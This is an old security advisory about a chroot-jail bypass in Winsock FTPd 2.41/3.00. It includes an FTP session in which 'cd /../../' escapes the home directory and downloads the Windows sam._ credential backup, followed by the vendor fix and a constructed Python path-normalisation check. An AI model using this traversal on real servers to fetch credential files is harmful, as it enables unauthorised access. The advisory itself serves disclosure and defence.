COMMAND

    Winsock FTPD

SYSTEMS AFFECTED

    Winsock FTPD 2.41/3.00 (Pro)

PROBLEM

    'Interstellar Overdrive' found the following.  Winsock FTPd is a
    common, popular FTP server for Windows 95/98/3.11/NT/2K by Texas
    Imperial Software.  It is a simple, inexpensive, and easy to set
    up FTP server for Windows machines; the current release is v3.0.

    In Winsock FTPd, there is an option called "Restrict to home
    directory and below" where the server makes a chroot jail for the
    user.  Let's take an example:

        c:>ftp target.com
        Connected to target.com
        User (target.com:(none)): io
        331 Give me your password, please
        Password: XXXXXX
        230 Logged in successfully
        ftp>pwd
        257 "/" is current directory     #io's directory here c:\wftpd\io
               #and it is chroot'ed
        ftp>ls
        200 PORT command okay
        150 File Listing Follows in ASCII mode.
        my_file.txt
        my_code.c
        226 Transfer finished successfully.
        11 Bytes received in 0.01 seconds (1.10 Kbytes/sec)
        ftp>cd ../../
        501 User is not allowed to change to ../../ - returning to /.
        ftp>
        #until now chroot jail working fine...
        
        #hmmm, lets try doing 'cd /../../'
        ftp>cd /../../
        250 "/../.." is current directory
        ftp>ls
        200 PORT command okay
        150 File Listing Follows in ASCII mode.
        wftpd
        inetpub
        DOS
        WINA20.386
        CONFIG.DOS
        CONFIG.SYS
        WINNT
        AUTOEXEC.BAT
        Program Files
        TEMP
        COMMAND.COM
        .....etc # cool !
        #even more fun
        ftp>cd /../../WINNT/repair/
        250 "/../../WINNT/repair/" is current directory
        ftp>get /../../WINNT/repair/sam._
        200 PORT command okay.......etc we got the file...

    The problem is that the chroot jail only works if the user tries
    ../../../ and not /../../../.  By simply adding a "/" before ../../
    (a commonly known bug in win32 applications), any local user or
    even an anonymous user can change their working directory to any
    directory on the server and download any file from the server (as
    you saw above).  In other words, the chroot jail is broken.

    Vulnerable Winsock FTPd applications found:

        - Winsock FTPd v2.41 RC14
        - Winsock FTPd v2.41 RC14 Pro
        - Winsock FTPd v3.00 Pro

SOLUTION

    The vendor was contacted, and a new release of Wftpd is out which
    fixes the problem: Wftpd v2.41 RC15 and Wftpd v3.00 R2.
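
    The kind of jail check the PROBLEM section shows failing, as an added
    example (not Wftpd's code and not part of the original advisory).
    naive_allows is a constructed check that only reproduces the behaviour
    seen in the transcript, since the server's real logic is not shown;
    resolve_virtual normalises the client path against the virtual root
    before any file-system access.  All function names are assumptions.

```python
import ntpath  # Windows path rules, importable on any platform

HOME = r"c:\wftpd\io"  # home directory named in the transcript's comment

def naive_allows(arg: str) -> bool:
    """Constructed flawed check: looks only at how the argument begins."""
    return not arg.startswith("..")

def resolve_virtual(cwd: str, arg: str) -> str:
    """Return the normalised virtual path, or raise if it climbs above "/"."""
    arg = arg.replace("\\", "/")  # Windows accepts both separators
    base = "/" if arg.startswith("/") else cwd
    stack = [p for p in base.split("/") if p]
    for part in arg.split("/"):
        if part in ("", "."):
            continue
        if ":" in part:  # drive letters and alternate data streams
            raise PermissionError(f"illegal component in {arg!r}")
        if part == "..":
            if not stack:  # already at the jail root: refuse, do not clamp
                raise PermissionError(f"{arg!r} escapes the home directory")
            stack.pop()
        else:
            stack.append(part)
    return "/" + "/".join(stack)

def real_path(home: str, cwd: str, arg: str) -> str:
    """Map a client-supplied path to a file-system path under home."""
    virtual = resolve_virtual(cwd, arg)
    return ntpath.join(home, *[p for p in virtual.split("/") if p])

def is_rejected(cwd: str, arg: str) -> bool:
    """True when the hardened resolver refuses the path."""
    try:
        real_path(HOME, cwd, arg)
        return False
    except PermissionError:
        return True
```

    The decision is made on the fully normalised path, so a leading "/",
    a backslash separator, or a ".." placed after a harmless component
    all reach the same check.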